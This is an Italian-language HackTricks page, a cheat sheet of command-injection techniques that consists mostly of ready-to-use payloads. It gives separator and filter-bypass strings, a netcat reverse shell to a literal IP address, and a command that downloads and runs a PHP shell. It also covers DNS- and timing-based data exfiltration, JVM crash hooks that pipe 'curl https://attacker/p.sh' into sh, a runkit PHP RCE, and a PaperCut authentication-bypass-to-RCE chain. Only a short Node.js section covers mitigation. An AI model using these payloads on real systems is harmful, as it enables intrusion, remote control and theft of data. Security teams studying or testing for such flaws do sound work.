Command Injection

Tip

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Sfoglia il catalogo completo di HackTricks Training per i percorsi di assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).

Supporta HackTricks

Che cos’è command Injection?

Una command injection permette l’esecuzione di comandi arbitrari del sistema operativo da parte di un attacker sul server che ospita un’applicazione. Di conseguenza, l’applicazione e tutti i suoi dati possono essere completamente compromessi. L’esecuzione di questi comandi tipicamente permette all’attacker di ottenere accesso non autorizzato o controllo sull’ambiente dell’applicazione e sul sistema sottostante.

Contesto

A seconda di dove il tuo input viene iniettato potresti dover terminare il contesto tra virgolette (usando " o ') prima dei comandi.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Motori di regole PHP con runkit abilitato

Alcune applicazioni implementano motori di regole accessibili solo agli admin eseguendo PHP fornito dall’attaccante. Se l’ambiente abilita l’estensione runkit, un attaccante può ridefinire o iniettare funzioni a runtime ed elevare un editor di regole puramente logico a PHP RCE completo.

Indicatori:

  • L’interfaccia admin accetta “regole” simili a PHP che vengono valutate.
  • runkit / runkit7 is loaded (phpinfo() or extension_loaded('runkit')).

Esempio di abuso (ridefinire una funzione usata dalle regole per eseguire un comando):

<?php
runkit_function_redefine('checkBid', '$bid', 'system($_GET["cmd"]); return true;');

Se il contenuto della regola viene memorizzato e valutato successivamente, diventa una primitiva RCE persistente nel contesto web.

Limitazioni Bypasses

Se stai cercando di eseguire comandi arbitrari all’interno di una macchina linux ti interesserà leggere questi Bypasses:

Bypass Linux Restrictions

Esempi

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Valutazione aritmetica in Bash in RewriteMap/CGI-style scripts

I helper RewriteMap scritti in bash a volte inseriscono parametri di query in variabili globali e successivamente li confrontano in contesti aritmetici ([[ $a -gt $b ]], $((...)), let). L’espansione aritmetica ritokenizza il contenuto, quindi nomi di variabili controllati dall’attaccante o riferimenti ad array vengono espansi due volte e possono eseguire.

Pattern seen in Ivanti EPMM RewriteMap helpers:

  1. I parametri vengono mappati su variabili globali (stgStartTime, htheValue).
  2. Controllo successivo:
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
...
fi
  1. Inviare st=theValue in modo che gStartTime punti alla stringa theValue.
  2. Inviare h=gPath['sleep 5'] in modo che theValue contenga un indice di array; durante il controllo aritmetico esegue sleep 5 (sostituire con un payload reale).

Probe (~5s delay then 404 if vulnerable):

curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"

Note:

  • Cerca lo stesso helper sotto altri prefissi (es., /mifs/c/aftstore/fob/).
  • I contesti aritmetici trattano token sconosciuti come identificatori di variabili/array, quindi questo bypassa semplici filtri di metacaratteri.

Parametri

Ecco i 25 parametri principali che potrebbero essere vulnerabili a code injection e a simili vulnerabilità RCE (da link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Esfiltrazione dei dati basata sul tempo

Estrazione dei dati: carattere per carattere

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Basato sullo strumento presente su https://github.com/HoLyVieR/dnsbin e ospitato anche su dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Strumenti online per verificare DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Bypass dei filtri

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Quando si effettua l’audit di back-end JavaScript/TypeScript, ci si imbatte spesso nell’API Node.js child_process.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() genera una shell (/bin/sh -c), quindi qualsiasi carattere che abbia un significato speciale per la shell (back-ticks, ;, &&, |, $(), …) provocherà una command injection quando l’input utente viene concatenato nella stringa.

Mitigazione: usa execFile() (o spawn() senza l’opzione shell) e fornisci ogni argomento come un elemento separato dell’array in modo che non sia coinvolta alcuna shell:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, senza metacaratteri della shell)

Non tutte le injection richiedono metacaratteri della shell. Se l’applicazione passa stringhe non attendibili come argomenti a un’utilità di sistema (anche con execve/execFile e senza shell), molti programmi continueranno comunque a interpretare qualsiasi argomento che inizi con - o -- come un’opzione. Questo permette a un attaccante di cambiare modalità, modificare i percorsi di output o innescare comportamenti pericolosi senza mai entrare in una shell.

Luoghi tipici in cui questo si manifesta:

  • Interfacce web integrate/gestori CGI che costruiscono comandi come ping <user>, tcpdump -i <iface> -w <file>, curl <url>, etc.
  • Router CGI centralizzati (es., /cgi-bin/<something>.cgi con un parametro selettore come topicurl=<handler>) dove più gestori riutilizzano lo stesso validatore debole.

Cosa provare:

  • Fornire valori che iniziano con -/-- in modo che vengano consumati come flag dallo strumento a valle.
  • Abusare di flag che cambiano il comportamento o scrivono file, per esempio:
  • ping: -f/-c 100000 per stressare il dispositivo (DoS)
  • curl: -o /tmp/x per scrivere percorsi arbitrari, -K <url> per caricare una config controllata dall’attaccante
  • tcpdump: -G 1 -W 1 -z /path/script.sh per ottenere esecuzione post-rotate in wrapper non sicuri
  • Se il programma supporta -- per indicare la fine delle opzioni, provare a bypassare mitigazioni ingenue che premettono -- nel punto sbagliato.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

Callback diagnostici JVM per exec garantita

Qualsiasi meccanismo che consente di iniettare argomenti della riga di comando JVM (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) può essere trasformato in una RCE affidabile senza toccare il bytecode dell’applicazione:

  1. Forza un crash deterministico riducendo metaspace o heap: -XX:MaxMetaspaceSize=16m (or a tiny -Xmx). Questo garantisce un OutOfMemoryError anche durante il bootstrap iniziale.
  2. Aggiungi un hook di errore: -XX:OnOutOfMemoryError="<cmd>" or -XX:OnError="<cmd>" esegue un comando arbitrario del sistema operativo ogni volta che la JVM abortisce.
  3. Opzionalmente aggiungi -XX:+CrashOnOutOfMemoryError per evitare tentativi di recovery e mantenere il payload one-shot.

Esempi di payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Poiché queste diagnostiche vengono analizzate dallo stesso JVM, non sono necessari metacaratteri della shell e il comando viene eseguito con lo stesso livello di integrità del launcher. I bug di Desktop IPC che inoltrano flag JVM forniti dall’utente (vedi Localhost WebSocket abuse) si traducono quindi direttamente in esecuzione di comandi OS.

PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE

  • Le build NG/MF vulnerabili (es., 22.0.5 Build 63914) espongono /app?service=page/SetupCompleted; navigando lì e cliccando Login viene restituito un valido JSESSIONID senza credenziali (bypass di autenticazione nel flusso di setup).
  • In Options → Config Editor, impostare print-and-device.script.enabled=Y e print.script.sandboxed=N per attivare il printer scripting e disabilitare la sandbox.
  • Nella scheda Scripting della stampante, abilitare lo script e mantenere printJobHook definito per evitare errori di validazione, ma posizionare il payload outside della funzione in modo che venga eseguito immediatamente quando si clicca Apply (non è necessario alcun print job):
function printJobHook(inputs, actions) {}
cmd = ["bash","-c","curl http://attacker/hit"];
java.lang.Runtime.getRuntime().exec(cmd);
  • Sostituisci il callback con una reverse shell; se la UI/PoC non può gestire pipes/redirects, prepara un payload con un comando ed eseguilo con una seconda richiesta.
  • Lo CVE-2023-27350.py di Horizon3 automatizza l’auth bypass, i config flips, l’esecuzione di comandi e il rollback — eseguilo tramite un proxy upstream (es., proxychains → Squid) quando il servizio è raggiungibile solo internamente.

Brute-Force Detection List

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Riferimenti

Tip

Impara e pratica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Impara e pratica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Sfoglia il catalogo completo di HackTricks Training per i percorsi di assessment (ARTA/GRTA/AzRTA) e Linux Hacking Expert (LHE).

Supporta HackTricks